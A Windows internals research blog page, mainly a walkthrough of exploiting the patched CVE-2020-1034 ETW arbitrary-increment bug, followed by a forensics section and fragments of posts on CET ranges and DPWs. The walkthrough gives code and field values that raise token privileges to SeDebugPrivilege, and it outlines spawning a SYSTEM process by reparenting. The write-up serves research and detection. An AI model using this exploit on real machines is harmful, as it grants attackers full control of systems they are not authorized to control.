                                     ProcessDynamicEnforcedCetCompatibleRanges,
                                     &dynamicEnforcedAddressRanges,
                                     sizeof(PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION));
    if (NT_SUCCESS(status))
    {
        return TRUE;
    }
    BaseSetLastNTError(status);
    return FALSE;
}

This tree is used every time a CET fault happens – KiControlProtectionFaultShadow is invoked. It calls into KiControlProtectionFault, which calls KiProcessControlProtection. This function will look for the target address in the shadow stack and if it fails, will try the dynamic enforced CET compatible ranges through an exception handler.

First, the handler checks in strict CET is enabled in the system, to know whether it should check if the process has CET enabled (as a reminder, strict CET means that CET checks will be performed on all processes, regardless of how they were compiled). If strict mode is not enabled, the function will check the image headers for the CETCOMPAT flags and will skip the ranges check if the flag is not set.

If it was determined that CET should be enforced for the image, the function will call RtlFindDynamicEnforcedAddressInRanges to check if the target address is inside one dynamically enforced CET compatible address ranges. The function returns a BOOLEAN value to indicate whether a suitable range for the address was found or not. If a range was found, or if for some other reason the process should not be crashed (process is not CET compatible or audit mode is enabled), the function will then call KiFixupControlProtectionUserModeReturnMismatch to insert the target address into the shadow stack to allow the process to continue normal execution.

The Mitigation

Looking at all of this, an obvious flaw comes to mind. If a process can declare ranges that will be ignored by CET, all an exploit needs to do to bypass CET is manage to add a useful range in the process memory to the tree, and then ROP itself in the approved range.

This is why the CetDynamicApisOutOfProcOnly flag was added – it only allows a process to add dynamic CET compatible ranges for remote processes, and not for themselves. It does a very simple thing – inside NtSetInformationProcess, before calling PspProcessDynamicEnforcedAddressRanges, the function checks if CetDynamicApisOutOfProcOnly is set for the process and if the process is trying to add dynamic CET compatible ranges for itself. If so, the function will return STATUS_ACCESS_DENIED and the attempt will fail.

And actually in the newest builds of Windows, almost all Windows processes have this flag set by default. The only process that doesn’t appear to have it enabled is the Idle process (which doesn’t have a real EPROCESS structure, only a KPROCESS, so we’re effectively reading garbage memory).

Read our other blog posts:

Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!

Introduction

In September MS issued a patch that fixed the CVE-2020-1034 vulnerability. This is a pretty cool and relatively simple vulnerability (increment by one), so I wanted to use it as a case study and look at a side of exploitation that isn’t talked about very often. Most public talks and blog posts related to vulnerabilities and exploits go into depth about the vulnerability itself, its discovery and research, and end with a PoC showing a successful “exploitation” – usually a BSOD with some kernel address being set to 0x41414141. This type of analysis is cute and splashy, but I wanted to look at the step after the crash – how to take a vulnerability and actually build a stable exploit around it, preferably one that isn’t detected easily?

This post will go into a bit more detail about the vulnerability itself, as when it’s been explained by others it was mainly with screenshots of assembly code, and data structures with magic numbers and uninitialized stack variables. Thanks to tools such as the public symbol files (PDB) from Microsoft, SDK header files, as well as Hex-rays Decompiler from IDA, a slightly easier to understand analysis can be made, revealing the actual underlying cause(s). Then, this post will focus on exploring the Windows mechanisms involved in the vulnerability and how they can be used to create a stable exploit that results in local privilege escalation without crashing the machine (which is what a naïve exploitation of this vulnerability will eventually result in, for reasons I’ll explain).

 

The Vulnerability

In short, CVE-2020-1034 is an input validation bug in EtwpNotifyGuid that allows an increment of an arbitrary address. The function doesn’t account for all possible values of a specific input parameter (ReplyRequested) and for values other than 0 and 1 will treat an address inside the input buffer as an object pointer and try to reference it, which will result in an increment at ObjectAddress - offsetof(OBJECT_HEADER, Body). The root cause is essentially a check that applies the BOOLEAN logic of “!= FALSE” in one case, while then using “== TRUE” in another. A value such as 2 incorrectly fails the second check, but still hits the first.

NtTraceControl receives an input buffer as its second parameter. In the case leading to this vulnerability, the buffer will begin with a structure of type ETWP_NOTIFICATION_HEADER. This input parameter is passed into EtwpNotifyGuid, where the following check happens:

If NotificationHeader->ReplyRequested is 1, the ReplyObject field of the structure will be populated with a new UmReplyObject. A little further down the function, the notification header, or actually a kernel copy of it, is passed to EtwpSendDataBlock and from there to EtwpQueueNotification, where we find the bug:

If NotificationHeader->ReplyRequested is not 0, ObReferenceObject is called, which is going to grab the OBJECT_HEADER that is found right before the object body and increment PointerCount by 1. Now we can see the problem – ReplyRequested is not a single bit that can be either 0 or 1. It’s a BOOLEAN, meaning it can be any value from 0 to 0xFF. And any non-zero value other than 1 will not leave the ReplyObject field untouched but will still call ObReferenceObject with whichever address the (user-mode) caller supplied for this field, leading to an increment of an arbitrary address. Since PointerCount is the first field in OBJECT_HEADER, this means that the address that will be incremented is the one in NotificationHeader->ReplyObject - offsetof(OBJECT_HEADER, Body).

The fix of this bug is probably obvious to anyone reading this and involved a very simple change in EtwpNotifyGuid:

if (notificationHeader->ReplyRequested != FALSE)
{
    status = EtwpCreateUmReplyObject((ULONG_PTR)etwGuidEntry,
                                     &Handle,
                                     &replyObject);
    if (NT_SUCCESS(status))
    {
        notificationHeader->ReplyObject = replyObject;
        goto alloacteDataBlock;
    }
}
else
{
    ...
}

Any non-zero value in ReplyRequested will lead to allocating a new reply object that will overwrite the value passed in by the caller.

On the surface this bug sounds very easy to exploit. But in reality, not so much. Especially if we want to make our exploit evasive and hard to detect. So, let’s begin our journey by looking at how this vulnerability is triggered and then try to exploit it.

How to Trigger

This vulnerability is triggered through NtTraceControl, which has this signature:

NTSTATUS
NTAPI
NtTraceControl (
    _In_ ULONG Operation,
    _In_ PVOID InputBuffer,
    _In_ ULONG InputSize,
    _In_ PVOID OutputBuffer,
    _In_ ULONG OutputSize,
    _Out_ PULONG BytesReturned
);

If we look at the code inside NtTraceControl we can learn a few things about the arguments we need to send to trigger the vulnerability:

The function has a switch statement for handling the Operation parameter – to reach EtwpNotifyGuid we need to use EtwSendDataBlock (17). We also see some requirements about the sizes we need to pass in, and we can also notice that the NotificationType we need to use should not be EtwNotificationTypeEnable as that will lead us to EtwpEnableGuid instead. There are a few more restrictions on the NotificationType field, but we’ll see those soon.

It’s worth noting that this code path is called by the Win32 exported function EtwSendNotification, which Geoff Chappel documented on his blog post. The information on Notify GUIDs is also valuable  where Geoff corroborates the parameter checks shown above.

Let’s look at the ETWP_NOTIFICATION_HEADER structure to see what other fields we need to consider here:

typedef struct _ETWP_NOTIFICATION_HEADER
{
    ETW_NOTIFICATION_TYPE NotificationType;
    ULONG NotificationSize;
    LONG RefCount;
    BOOLEAN ReplyRequested;
    union
    {
        ULONG ReplyIndex;
        ULONG Timeout;
    };
    union
    {
        ULONG ReplyCount;
        ULONG NotifyeeCount;
    };
    union
    {
        ULONGLONG ReplyHandle;
        PVOID ReplyObject;
        ULONG RegIndex;
    };
    ULONG TargetPID;
    ULONG SourcePID;
    GUID DestinationGuid;
    GUID SourceGuid;
} ETWP_NOTIFICATION_HEADER, *PETWP_NOTIFICATION_HEADER;

Some of these fields we’ve seen already and others we didn’t, and some of these don’t matter much for the purpose of our exploit. We’ll begin with the field that required the most work – DestinationGuid:

Finding the Right GUID

ETW is based on providers and consumers, where the providers notify about certain events and the consumers can choose to be notified by one or more providers. Each of the providers and consumers in the system is identified by a GUID.

Our vulnerability is in the ETW notification mechanism (which used to be WMI but now it is all part of ETW). When sending a notification, we are actually notifying a specific GUID, so we need to be careful to pick one that will work.

The first requirement is picking a GUID that actually exists on the system:

One of the first things that happens in EtwpNotifyGuid is a call to EtwpFindGuidEntryByGuid, with the DestinationGuid passed in, followed by an access check on the returned ETW_GUID_ENTRY.

What GUIDs are Registered?

To find a GUID that will successfully pass this code we should first go over a bit of ETW internals. The kernel has a global variable named PspHostSiloGlobals, which is a pointer to a ESERVERSILO_GLOBALS structure. This structure contains a EtwSiloState field, which is a ETW_SILODRIVERSTATE structure. This structure has lots of interesting information that is needed for ETW management, but the one field we need for our research is EtwpGuidHashTables. This is an array of 64 ETW_HASH_BUCKETS structures. To find the right bucket for a GUID it needs to be hashed this way: (Guid->Data1 ^ (Guid->Data2 ^ Guid->Data4[0] ^ Guid->Data4[4])) & 0x3F. This system was probably implemented as a performant way to find the kernel structures for GUIDs, since hashing the GUID is faster than iterating a list.

Each bucket contains a lock and 3 linked lists, corresponding to the 3 values of ETW_GUID_TYPE:

These lists contain structures of type ETW_GUID_ENTRY, which have all the needed information for each registered GUID:

As we can see in the screenshot earlier, EtwpNotifyGuid passes EtwNotificationGuid type as the ETW_GUID_TYPE (unless NotificationType is EtwNotificationTypePrivateLogger, but we will see later that we should not be using that). We can start by using some WinDbg magic to print all the ETW providers registered on my system under EtwNotificationGuidType and see which ones we can choose from:

When EtwpFindGuidEntryByGuid is called, it receives a pointer to the ETW_SILODRIVERSTATE, the GUID to search for and the ETW_GUID_TYPE that this GUID should belong to, and returns the ETW_GUID_ENTRY for this GUID. If a GUID is not found, it will return NULL and EtwpNotifyGuid will exit with STATUS_WMI_GUID_NOT_FOUND.

dx -r0 @$etwNotificationGuid = 1
dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink})

Only one active GUID is registered on my system! This GUID could be interesting to use for our exploit, but before we do, we should look at a few more details related to it.

In the diagram earlier we can see the RegListHead field inside the ETW_GUID_ENTRY. This is a linked list of ETW_REG_ENTRY structures, each describing a registered instance of the provider, since the same provider can be registered multiple times, by the same process or different ones. We’ll grab the “hash” of this GUID (25) and print some information from its RegList:

dx -r0 @$guidEntry = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[25].Flink)
dx -g Debugger.Utility.Collections.FromListEntry(@$guidEntry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

There are 6 instances of this GUID being registered on this system by 6 different processes. This is cool but could make our exploit unstable – when a GUID is notified, all of its registered entries get notified and might try to handle the request. This causes two complications:

  1. We can’t predict accurately how many increments our exploit will cause for the target address, since we could get one increment for each registered instance (but not guaranteed to – this will be explained soon).
  2. Each of the processes that registered this provider could try to use our fake notification in a different way that we didn’t plan for. They could try to use the fake event, or read some data that isn’t formatted properly, and cause a crash. For example, if the notification has NotificationType = EtwNotificationTypeAudio, Audiodg.exe will try to process the message, which will make the kernel free the ReplyObject. Since the ReplyObject is not an actual object, this causes an immediate crash of the system. I didn’t test different cases, but it’s probably safe to assume that even with a different NotificationType this will still crash eventually as some registered process tries to handle the notification as a real one.

Since the goal we started with was creating a stable and reliable exploit that doesn’t randomly crash the system, it seems that this GUID is not the right one for us. But this is the only registered provider in the system, so what else are we supposed to use?

A Custom GUID

We can register our own provider! This way we are guaranteed that no one else is going to use it and we have full control over it. EtwNotificationRegister allows us to register a new provider with a GUID of our choice.

And again, I’ll save you the trouble of trying this out for yourself and tell you in advance that this just doesn’t work. But why?

Like everything on Windows, an ETW_GUID_ENTRY has a security descriptor, describing which actions different users and groups are allowed to perform on it. And as we saw in the screenshot earlier, before notifying a GUID EtwpNotifyGuid calls EtwpAccessCheck to check if the GUID has WMIGUID_NOTIFICATION access set for the user which is trying to notify it.

To test this, I registered a new provider, which we can see when we dump the registered providers the same way we did earlier:

And use the !sd command to print its security descriptor nicely (this is not the full list, but I trimmed it down to the relevant part):

A security descriptor is made up of groups (SID) and an ACCESS_MASK (ACL). Each group is represented by a SID, in the form of “S-1-...” and a mask describing the actions this group is allowed to perform on this object. Since we are running as a normal user with an integrity level of medium, we are usually pretty limited in what we can do. The main groups that our process is included in are Everyone (S-1-1-0) and Users (S-1-5-32-545). As we can see here, the default security descriptor for an ETW_GUID_ENTRY doesn’t contain any specific access mask for Users, and the access mask for Everyone is 0x1800 (TRACELOG_JOIN_GROUP | TRACELOG_REGISTER_GUIDS). Higher access masks are reserved for more privileges groups, such as Local System and Administrators. Since our user doesn’t have WMIGUID_NOTIFICATION privileges for this GUID, we will receive STATUS_ACCESS_DENIED when trying to notify it and our exploit will fail.

That is, unless you are running it on a machine that has Visual Studio installed. Then the default Security Descriptor changes and Performance Log Users (which are basically any logged in user) receive all sorts of interesting privileges, including the two we care about. But let’s pretend that your exploit is not running on a machine that has one of the most popular Windows tools installed on it and focus on clean Windows machines without weird permission bugs.

Well, not all GUIDs use the default security descriptor. It is possible to change the access rights for a GUID, through the registry key HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security:

This key contains all the GUIDs in the system using non-default security descriptors. The data is the security descriptor for the GUID, but since it is shown here as a REG_BINARY it is a bit difficult to parse this way.

Ideally, we would just add our new GUID here and a more permitting configuration and go on to trigger the exploit. Unfortunately, letting any user change the security descriptor of a GUID will break the Windows security model, so access to this registry key is reserved for SYSTEM, Administrators and EventLog:

If our default security descriptor is not strong enough and we can’t change it without a more privileged process, it looks like we can’t actually achieve much using our own GUID.

Living Off the Land

Luckily, using the one registered GUID on the system and registering our own GUID are not the only available choices. There are a lot of other GUIDs in that registry key that already have modified permissions. At least one of them must allow WMIGUID_NOTIFICATION for a non-privileged user.

Here we face another issue – actually, in this case WMIGUID_NOTIFICATION is not enough. Since none of these GUIDs is a registered provider yet, we will first need to register them before being able to use them for our exploit. When registering a provider through EtwNotificationRegister, the request goes through NtTraceControl and reaches EtwpRegisterUMGuid, where this check is done:

To be able to use an existing GUID, we need it to allow both WMIGUID_NOTIFICATION and TRACELOG_REGISTER_GUIDS for a normal user. To find one we’ll use the magic of PowerShell, which manages to have such an ugly syntax that it almost made me give up and write a registry parser in C instead (if you didn’t notice the BOOLEAN AND so far, now you did. Yes, this is what it is. I’m sorry). We’ll iterate over all the GUIDs in the registry key and check the security descriptor for Everyone (S-1-1-0), and print the GUIDs that allow at least one of the permissions we need:

$RegPath = "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security"
foreach($line in (Get-Item $RegPath).Property) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-1-0 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Not much luck here. Other than the GUID we already know about nothing allows both the permission we need to Everyone.

But I’m not giving up yet! Let’s try the script again, this time checking the permissions for Users (S-1-5-32-545):

foreach($line in Get-Content C:\Users\yshafir\Desktop\guids.txt) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-5-32-545 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Now this is much better! There are multiple GUIDs allowing both the things we need; we can choose any of them and finally write an exploit!

For my exploit I chose to use the second GUID in the screenshot – {4838fe4f-f71c-4e51-9ecc-8430a7ac4c6c} – belonging to “Kernel Idle State Change Event”. This was a pretty random choice and any of the other ones than enable both needed rights should work the same way.

What Do We Increment?

Now starts the easy part – we register our shiny new GUID, choose an address to increment, and trigger the exploit. But what address do we want to increment?

The easiest choice for privilege escalation is the token privileges:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges                 [Type: _SEP_TOKEN_PRIVILEGES]    
[+0x000] Present          : 0x602880000 [Type: unsigned __int64]    
[+0x008] Enabled          : 0x800000 [Type: unsigned __int64]    
[+0x010] EnabledByDefault : 0x40800000 [Type: unsigned __int64]

When checking if a process or a thread can do a certain action in the system, the kernel checks the token privileges – both the Present and Enabled bits. That makes privilege escalation relatively easy in our case: if we want to give our process a certain useful privilege – for example SE_DEBUG_PRIVILEGE, which allows us to open a handle to any process in the system – we just need to increment the privileges of the process token until they contain the privilege we want to have.

There are a few simple steps to achieve that:

  1. Open a handle to the process token.
  2. Get the address of the token object in the kernel – Use NtQuerySystemInformation with SystemHandleInformation class to receive all the handles in the system and iterate them until we find the one matching our token and save the Object address.
  3. Calculate the address of Privileges.Present and Privileges.Enabled based on the offsets inside the token.
  4. Register a new provider with the GUID we found.
  5. Build the malicious ETWP_NOTIFICATION_HEADER structure and call NtTraceControl the correct number of times (0x100000 for SE_DEBUG_PRIVILEGE) to increment Privileges.Present, and again to increment Privileges.Enabled.

Like a lot of things, this sounds great until you actually try it. In reality, when you try this you will see that your privileges don’t get incremented by 0x100000. In fact, Present privileges only gets incremented by 4 and Enabled stays untouched. To understand why we need to go back to ETW internals…

Slots and Limits

Earlier we saw how the GUID entry is represented in the kernel and that each GUID can have multiple ETW_REG_ENTRY structures registered to it, representing each registration instance. When a GUID gets notified, the notification gets queues for all of its registration instances (since we want all processes to receive a notification). For that, the ETW_REG_ENTRY has a ReplyQueue, containing 4 ReplySlot entries. Each of these is pointing to an ETW_QUEUE_ENTRY structure, which contains the information needed to handle the request – the data block provided by the notifier, the reply object, flags, etc:

This is not relevant for this exploit, but the ETW_QUEUE_ENTRY also contains a linked list of all the queued notifications waiting for this process, from all GUIDs. Just mentioning it here because this could be a cool way to reach different GUIDs and processes and worth exploring 🙂

Since every ETW_REG_ENTRY only has 4 reply slots, it can only have 4 notifications waiting for a reply at any time. Any notification that arrives while the 4 slots are full will not be handled – EtwpQueueNotification will reference the “object” supplied in ReplyObject, only to immediately dereference it when it sees that the reply slots are full:

Usually this is not an issue since notifications get handled pretty quickly by the consumer waiting for them and get removed from the queue almost immediately. However, this is not the case for our notifications – we are using a GUID that no one else is using, so no one is waiting for these notifications. On top of that, we are sending “corrupted” notifications, which have the ReplyRequested field set to non-zero, but don’t have a valid ETW registration object set as their ReplyObject (since we are using an arbitrary pointer that we want to increment). Even if we reply to the notifications ourselves, the kernel will try to treat our ReplyObject as a valid ETW registration object, and that will most likely crash the system one way or another.

Sounds like we are blocked here — we can’t reply to our notifications and no one else will either, and that means we have no way to free the slots in the ETW_REG_ENTRY and are limited to 4 notifications. Since freeing the slots will probably result in crashing the system, it also means that our process can’t exit once it triggers the vulnerability – when a process exits all of its handles get closed and that will lead to freeing all the queued notifications.

Keeping our process alive is not much of an issue, but what can we do with only 4 increments?

The answer is, we don’t really need to limit ourselves to 4 increments and can actually use just one – if we use our knowledge of how ETW works.

Provider Registration to the Rescue

Now we know that every registered provider can only have up to 4 notifications waiting for a reply. The good news is that there is nothing stopping us from registering more than one provider, even for the same GUID. And since every notification gets queued for all registered instances for the GUID, we don’t even need to notify each instance separately – we can register X providers and only send one notification, and receive X increments for our target address! Or we can send 4 notifications and get 4X increments (for the same target address, or up to 4 different ones):

Knowing that, can we register 0x100000 providers, then notify them once with a “bad” ETW notification and get SE_DEBUG_PRIVILEGE in our token and finally have an exploit?

Not exactly.

When registering a provider using EtwNotificationRegister, the function first needs to allocate and initialize an internal registration data structure that will be sent to NtTraceControl to register the provider. This data structure is allocated with EtwpAllocateRegistration, where we see the following check:

Ntdll only allows the process to register up to 0x800 providers. If the current number of registered providers for the process is 0x800, the function will return and the operation will fail.

Of course, we can try to bypass this by figuring out the internal structures, allocating them ourselves and calling NtTraceControl directly. However, I wouldn’t recommend it — this is complicated work and might cause unexpected side effects when ntdll will try to handle a reply for providers that it doesn’t know of.

Instead, we can do something much simpler: we want to increment our privileges by 0x100000. But if we look at the privileges as separate bytes and not as a DWORD, we’ll see that actually, we only want to increment the 3rd byte by 0x10:

To make our exploit simpler and only require 0x10 increments, we will just add 2 bytes to our target addresses for both Privileges.Present and Privileges.Enabled. We can further minimize the amount of calls we need to make to NtTraceControl if we register 0x10 providers using the GUID we found, then send one notification with the address of Privileges.Present as a target, and another one with the address of Privileges.Enabled.

Now we only have one thing left to do before writing our exploit – building our malicious notification.

Notification Header Fields

ReplyRequested

As we’ve seen in the beginning of this post (so to anyone who made it this far, probably 34 days ago), the vulnerability is triggered through a call to NtTraceControl with an ETWP_NOTIFICATION_HEADER structure where ReplyRequested is a value other than 0 and 1. For this exploit I’ll use 2, but any other value between 2 and 0xFF will work.

NotificationType

Then we need to pick a notification type out of the ETW_NOTIFICATION_TYPE enum:

typedef enum _ETW_NOTIFICATION_TYPE
{
    EtwNotificationTypeNoReply = 1,
    EtwNotificationTypeLegacyEnable = 2,
    EtwNotificationTypeEnable = 3,
    EtwNotificationTypePrivateLogger = 4,
    EtwNotificationTypePerflib = 5,
    EtwNotificationTypeAudio = 6,
    EtwNotificationTypeSession = 7,
    EtwNotificationTypeReserved = 8,
    EtwNotificationTypeCredentialUI = 9,
    EtwNotificationTypeMax = 10,
} ETW_NOTIFICATION_TYPE;

We’ve seen earlier that our chosen type should not be EtwNotificationTypeEnable, since that will lead to a different code path that will not trigger our vulnerability.

We also shouldn’t use EtwNotificationTypePrivateLogger or EtwNotificationTypeFilteredPrivateLogger. Using these types changes the destination GUID to PrivateLoggerNotificationGuid and requires having access TRACELOG_GUID_ENABLE, which is not available for normal users. Other types, such as EtwNotificationTypeSession and EtwNotificationTypePerflib are used across the system and could lead to unexpected results if some system component tries to handle our notification as belonging to a known type, so we should probably avoid those too.

The two safest types to use are the last ones – EtwNotificationTypeReserved, which is not used by anything in the system that I could find, and EtwNotificationTypeCredentialUI, which is only used in notifications from consent.exe when it opens and closes the UAC popup, with no additional information sent (what is this notification good for? It’s unclear. And since there is no one listening for it I guess MS is not sure why it’s there either, or maybe they completely forgot it exists). For this exploit, I chose to use EtwNotificationTypeCredentialUI.

NotificationSize

As we’ve seen in NtTraceControl, the NotificationSize field has to be at least sizeof(ETWP_NOTIFICATION_HEADER). We have no need for any more than that, so we will make it this exact size.

ReplyObject

This will be the address that we want to increment + offsetof(OBJECT_HEADER, Body) – the object header contains the first 8 bytes of the object it in, so we shouldn’t include them in our calculation, or we’ll have an 8-byte offset. And to that we will add 2 more bytes to directly increment the third byte, which is the one we are interested in.

This is the only field we’ll need to change between our notifications – our first notification will increment Privileges.Present, and the second will increment Privileges.Enabled.

Other than DestinationGuid, which we already talked about a lot, the other fields don’t interest us and are not used in our code paths, so we can leave them at 0.

Building the Exploit

Now we have everything we need to try to trigger our exploit and get all those new privileges!

Registering Providers

First, we’ll register our 0x10 providers. This is pretty easy and there’s not much to explain here. For the registration to succeed we need to create a callback. This will be called whenever the provider is notified and can reply to the notification. I chose not to do anything in this callback, but it’s an interesting part of the mechanism that can be used to do some interesting things, such as using it as an injection technique.

But this blog post is already long enough so we will just define a minimal callback that does nothing:

ULONG
EtwNotificationCallback (
    _In_ ETW_NOTIFICATION_HEADER* NotificationHeader,
    _In_ PVOID Context
    )
{
    return 1;
}

And then register our 0x10 providers with the GUID we picked:

REGHANDLE regHandle;
for (int i = 0; i < 0x10; i++)
{
    result = EtwNotificationRegister(&EXPLOIT_GUID,
                                     EtwNotificationTypeCredentialUI,
                                     EtwNotificationCallback,
                                     NULL,
                                     &regHandle);
    if (!SUCCEEDED(result))
    {
        printf("Failed registering new provider\n");
        return 0;
    }
}

I’m reusing the same handle because I have no intention of closing these handles – closing them will lead to freeing the used slots, and we’ve already determined that this will lead to a system crash.

The Notification Header

After all this work, we finally have our providers and all the notification fields that we need, we can build our notification header and trigger the exploit! Earlier I explained how to get the address of our token and it mostly just involves a lot of code, so I won’t show it here again, let’s assume that getting the token was successful and we have its address.

First, we calculate the 2 addresses we will want to increment:

presentPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Present) + 2);
enabledPrivilegesAddress = (PVOID)((ULONG_PTR)tokenAddress +
                           offsetof(TOKEN, Privileges.Enabled) + 2);

Then we will define our data block and zero it:

ETWP_NOTIFICATION_HEADER dataBlock;
RtlZeroMemory(&dataBlock, sizeof(dataBlock));

And populate all the needed fields:

dataBlock.NotificationType = EtwNotificationTypeCredentialUI;
dataBlock.ReplyRequested = 2;
dataBlock.NotificationSize = sizeof(dataBlock);
dataBlock.ReplyObject = (PVOID)((ULONG_PTR)(presentPrivilegesAddress) +
                        offsetof(OBJECT_HEADER, Body));
dataBlock.DestinationGuid = EXPLOIT_GUID;

And finally, call NtTraceControl with our notification header (we could have passed dataBlock as the output buffer too, but I decided to define a new ETWP_NOTIFICATION_HEADER and use that for clarify):

status = NtTraceControl(EtwSendDataBlock,
                        &dataBlock,
                        sizeof(dataBlock),
                        &outputBuffer,
                        sizeof(outputBuffer),
                        &returnLength);

We will then repopulate the fields with the same values, set ReplyObject to (PVOID)((ULONG_PTR)(enabledPrivilegesAddress) + offsetof(OBJECT_HEADER, Body)) and call NtTraceControl again to increment our Enabled privileges.

Then we look at our token:

And we have SeDebugPrivilege!

Now what do we do with it?

Using SeDebugPrivilege

Once you have SeDebugPrivilege you have access to any process in the system. This gives you plenty of different ways to run code as SYSTEM, such as injecting code to a system process.

I chose to use the technique that Alex and I demonstrated in faxhell – Creating a new process and reparenting it to have a non-suspicious system-level parent, which will make the new process run as SYSTEM. As a parent I chose to use the same one that we did in Faxhell – the DcomLaunch service.

The full explanation of this technique can be found in the blog post about faxhell, so I will just briefly explain the steps:

  1. Use the exploit to receive SeDebugPrivilege.
  2. Open the DcomLaunch service, query it to receive the PID and open the process with PROCESS_ALL_ACCESS.
  3. Initialize process attributes and pass in the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute and the handle to DcomLaunch to set it as the parent.
  4. Create a new process using these attributes.

I implemented all those steps and…

Got a cmd process running as SYSTEM under DcomLaunch!

Forensics

Since this exploitation method leaves queued notifications that will never get removed, it’s relatively easy to find in memory – if you know where to look.

We go back to our WinDbg command from earlier and parse the GUID table. This time we also add the header to the ETW_REG_ENTRY list, and the number of items on the list:

dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink, RegCount = Debugger.Utility.Collections.FromListEntry(Entry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Count()})

As expected, we can see here 3 GUIDs – the first one, that was already registered in the system the first time we checked, the second, which we are using for our exploit, and the test GUID, which we registered as part of our attempts.

Now we can use a second command to see the who is using these GUIDs. Unfortunately, there is no nice way to view the information for all GUIDs at once, so we’ll need to pick one at a time. When doing actual forensic analysis, you’d have to look at all the GUIDs (and probably write a tool to do this automatically), but since we know which GUID our exploit is using we’ll just focus on it.

We’ll save the GUID entry in slot 42:

dx -r0 @$exploitGuid = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[42].Flink)

And print the information about all the registered instances in the list:

dx -g @$regEntries = Debugger.Utility.Collections.FromListEntry(@$exploitGuid->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {ReplyQueue = r.ReplyQueue, ReplySlot = r.ReplySlot, UsedSlots = r.ReplySlot->Where(s => s != 0).Count(), Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

We can see that all instances are registered by the same process (conveniently named “exploit_part_1”). This fact by itself is suspicious, since usually a process will not have a reason to register the same GUID more than once and tells us we should probably look further into this.

If we want to investigate these suspicious entries a bit more, we can look at one of the notification queues:

dx -g @$regEntries[0].ReplySlot

These look even more suspicious – their Flags are ETW_QUEUE_ENTRY_FLAG_HAS_REPLY_OBJECT (2) but their ReplyObject fields don’t look right – they are not aligned the way objects are supposed to be.

We can run !pool on one of the objects and see that this address is actually somewhere inside a token object:

And if we check the address of the token belonging to the exploit_part_1 process:

dx @$regEntries[0].Process->Token.Object & ~0xf
@$regEntries[0].Process->Token.Object & ~0xf : 0xffff908912ded0a0
? 0xffff908912ded112 - 0xffff908912ded0a0
Evaluate expression: 114 = 00000000`00000072

We’ll see that the address we see in the first ReplyObject is 0x72 bytes after the token address, so it is inside this process’ token. Since a ReplyObject should be pointing to an ETW registration object, and definitely not somewhere in the middle of a token, this is obviously pointing towards some suspicious behavior done by this process.

Show Me The Code

The full PoC can be found in the GitHub repository.

Conclusion

One of the things I wanted to show in this blog post is that there is almost no such thing as a “simple” exploit anymore. And 5000 words later, I think this point should be clear enough. Even a vulnerability like this, which is pretty easy to understand and very easy to trigger, still takes a significant amount of work and understanding of internal Windows mechanisms to turn into an exploit that doesn’t immediately crash the system, and even more work to do anything useful with.

That being said, these kinds of exploits are the most fun — because they don’t rely on any ROP or HVCI violations, and have nothing to do with XFG or CET or page tables or PatchGuard. Simple, effective, data-only attacks, will always be the Achille’s heel of the security industry, and will most likely always exist in some form.

This post focused on how we can safely exploit this vulnerability, but once we got our privileges, we did pretty standard stuff with them. In future posts, I might showcase some other interesting things to do with arbitrary increments and token objects, which are more interesting and complicated, and maybe make attacks harder to detect too.

Read our other blog posts:

DPWs are the new DPCs : Deferred Procedure Waits in Windows 10 21H1

With the Windows 21H1 (Iron/“Fe”) feature complete deadline looming, the last few Dev Channel builds have had some very interesting changes and additions, which will probably require a few separate blog posts to cover fully. One of those was in a surprising part of the code – object wait dispatching.

The new build introduced a few new functions:

  • KeRegisterObjectDpc (despite the name, it’s an internal non-exported function)
  • ExQueueDpcEventWait
  • ExCancelDpcEventWait
  • ExCreateDpcEvent
  • ExDeleteDpcEvent

